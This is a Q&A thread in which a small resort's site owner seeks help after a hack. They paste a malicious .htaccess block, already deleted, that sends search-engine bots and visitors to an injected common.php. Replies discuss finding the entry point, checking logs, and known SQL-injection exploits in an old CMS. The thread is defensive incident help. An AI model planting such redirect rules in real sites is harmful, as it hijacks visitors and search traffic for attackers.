-2

Possible Duplicate:
My server’s been hacked EMERGENCY

My website was hacked recently. I think i've found the code that was added to the htaccess file, deleted it and then added script to prevent the htaccess file being accessed again. I've also deleted the php file that the hacked code refers to (common.php). What do i need to do next? I'm not a programmer or website developer but i really wanted to see if i could fix the problem myself as i've spent quite a few hours trying and don't give up easily.

Here is the hacked code that i deleted:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC] 
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/httpd/vhosts/bluestardive.com/httpdocs/common.php -f
RewriteRule ^.*$    /common.php [L]
</IfModule>

this code has to stay in the htaccess file as it redirects my url to seo friendly ones or the website errors, but has this code been hacked as well?

# Apache search queries statistic module
RewriteEngine On
AddHandler php5-fastcgi .php .php5
# <contrexx>
#   <core_modules__alias>
    RewriteRule ^about-us$    /index.php?page=883 [L,NC]
    RewriteRule ^ausfluge-und-aktivitaten$    /index.php?page=800 [L,NC]
    RewriteRule ^bluestardive-news$    /index.php?page=919 [L,NC]
    RewriteRule ^bookings$    /index.php?page=911 [L,NC]
    RewriteRule ^diveresort$    /index.php?page=879 [L,NC]
    RewriteRule ^diving$    /index.php?page=880 [L,NC]
    RewriteRule ^excursions-and-activities$    /index.php?page=881 [L,NC]
    RewriteRule ^galerie$    /index.php?section=gallery [L,NC]
    RewriteRule ^oceannight$    http://www.bluestardive.com/index.php?page=906 [L,NC]
    RewriteRule ^philosophy$    /index.php?page=846 [L,NC]
    RewriteRule ^reservation$    /index.php?page=917 [L,NC]
    RewriteRule ^reservierung$    /index.php?page=918 [L,NC]
    RewriteRule ^resort$    /index.php?page=798 [L,NC]
#   </core_modules__alias>
# </contrexx>
Community
  • 1
  • ...did you find out how they got in? If not, they'll probably just set up shop again soon. –  Oct 21 '12 at 05:26
  • If you have a dedicated host then you should talk to them to see how and where from the attackers got entry. This has happened to me as well, and my website got flagged as malicious by Google, making it impossible to enter it from searching it on Google. Check out http://www.stopbadware.org/ for tips that might help you cleanse whatever corruption that has been made. –  Oct 21 '12 at 05:44
  • i know it was one of two people that did it...we had a manager that was renting the resort until he got bored, he left the other week and left me with loads of issues to sort out he had server access..the other person was a guest and this manager aggrevated him so he could have hacked into the site... –  Oct 21 '12 at 05:45
  • contrexx have reset all the access codes and deleted the manager's access...if it was the guest that was the hacker will putting code in the htaccess file so that noone can edit it not prevent anyone from hacking the website? –  Oct 21 '12 at 05:47

1 Answers1

2

The best thing to do in situations like these is to pinpoint the users entry point, and duplicate the attack - I cannot tell you whether there is any thing suspicious added into the .htaccess as I have no idea what is inside of index.php.

If index.php echo's data directly from the database, then it might be possible that he/she added malicious code inside the database, he/she possibly created a few new entry points (PHP Shells, Vulns) in other files.

I would strongly recommend you to talk to a security professional - if not, thoroughly re-inspect every file on your server, including database entries.

Make sure to figure out what his entry point was as well, to prevent future attacks - if you need any further information you can always contact me.

Pfft
  • 121
  • 2
  • Hi Jimmy, the entry date on the htaccess file and the index page were the same, both were dates in the past when the website was fine...i think it's likely the index.php file got hacked...How do i edit php files? when i open it up it's just a mishmash of digits. I tried deleting the index.php file but it just crashed the website. –  Oct 21 '12 at 05:51
  • Are you running any CMS - or did you write your website yourself? Also; could you post the index.php here? Is that the only file on your server? –  Oct 21 '12 at 06:00
  • we use the contrexx cms and the website was designed by a compnay...i've been editing the htaccess through the ftp –  Oct 21 '12 at 06:04
  • What version of contrexx are you using? –  Oct 21 '12 at 06:05
  • Contrexx® Web Content Management System Standard Version 2.1 Service Pack 3 - Stable Release date: 23.01.2010 –  Oct 21 '12 at 06:10
  • it's an old version, but they wanted several hundred dollars to upgrade us...it's not economical for a small resort so i had to leave it. The cms is probably way too advanced for what we need but we inherited it. –  Oct 21 '12 at 06:11
  • There are multiple SQL injection vulnerabilities for that system. http://www.exploit-db.com/exploits/17667/ and http://www.exploit-db.com/exploits/17682/ they can be excellent entry points. –  Oct 21 '12 at 06:12
  • there are lots of files on the server, but only a couple had the same dates which were odd. i've opened the index file in wordpad but it's too big to post –  Oct 21 '12 at 06:13
  • Are your server logs untouched? Could you post them here? –  Oct 21 '12 at 06:16
  • are the logs in the server, the admin or on the ftp? –  Oct 21 '12 at 06:26
  • i can see ftp statistics on the server –  Oct 21 '12 at 06:27
  • You need the Apache logs. error.log, access.log, those. –  Oct 21 '12 at 06:30
  • I think you should consider using a different CMS - and delete all the files on the server. Unless, you are willingly to hire a security professional / or an upgrade for your current CMS. –  Oct 21 '12 at 06:47
  • there is a file called logs but it's empty...don't worry..thanks for all your help, i really appreciate it i should probably get contrexx to look into this –  Oct 21 '12 at 06:48